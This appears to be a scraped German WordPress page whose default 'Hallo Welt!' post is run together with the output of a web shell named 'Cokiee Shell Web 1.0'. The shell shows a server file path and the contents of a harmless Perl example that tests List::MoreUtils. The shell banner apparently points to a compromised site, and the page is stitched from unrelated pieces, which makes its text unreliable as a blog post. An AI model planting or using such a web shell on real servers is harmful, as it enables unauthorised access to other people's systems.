Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/share/doc/liblist-moreutils-perl/examples/ |
Current File : //usr/share/doc/liblist-moreutils-perl/examples/49796.pl |
#!/usr/bin/perl use strict; use warnings; use List::MoreUtils; print List::MoreUtils->VERSION, "\n"; my $obj = MyObj->new; for (;;) { eval { List::MoreUtils::uniq ($obj, $obj) }; } package MyObj; use overload '""' => \&stringize; sub new { my ($class) = @_; return bless {}, $class; } sub stringize { die "MyObj stringize error"; }
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare